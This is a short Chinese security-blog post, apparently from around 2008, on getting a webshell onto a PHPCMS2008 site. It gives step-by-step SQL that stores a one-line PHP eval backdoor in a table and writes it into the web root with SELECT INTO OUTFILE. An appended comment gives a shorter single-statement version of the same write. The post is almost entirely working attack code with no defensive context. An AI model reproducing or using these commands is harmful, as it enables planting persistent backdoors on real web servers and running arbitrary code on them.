导航

Web安全手册

分享本身就是件快乐的事 我因别人得到帮助而感到幸福

« 无线安全破解专用WPA-PSK Hash Table DVD下载地址汇总 - [Wireless Hack]SODB-2008-14发布 »

HOW TO GET PHPCMS2008 WEBSHELL

Posted by 小拳头

进去后

SQL代码
  1. Create TABLE b (cmd text NOT NULL);  

       

SQL代码
  1. Insert INTO b (cmd) VALUES('<?php @eval($_POST[cmd]);?>');  


//在字段cmd中插入一句话木马,木马内容为

PHP代码
  1. <?php @eval($_POST[cmd]);?>  


前3句都尅执行成功最后一句执行后显示空白

SQL代码
  1. select cmd from b into outfile 'E:\wwwroot\phpcms\phpcms\shell.php';  

 Tr4c3注:很早以前在phpmyadmin得webshell的方法,这样写太冗繁了,用下面的一句就可以了。

SELECT "<?eval($_POST[cmd]);" INTO OUTFILE 'E:\\wwwroot\\phpcms\\phpcms\\shell.php';

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog .Theme from Google黑板报 By Washun

Copyright 2008-2009 Pcsec.org. Some Rights Reserved.苏ICP备08110306号

Search

网站分类

文章归档

最新评论及回复

最近发表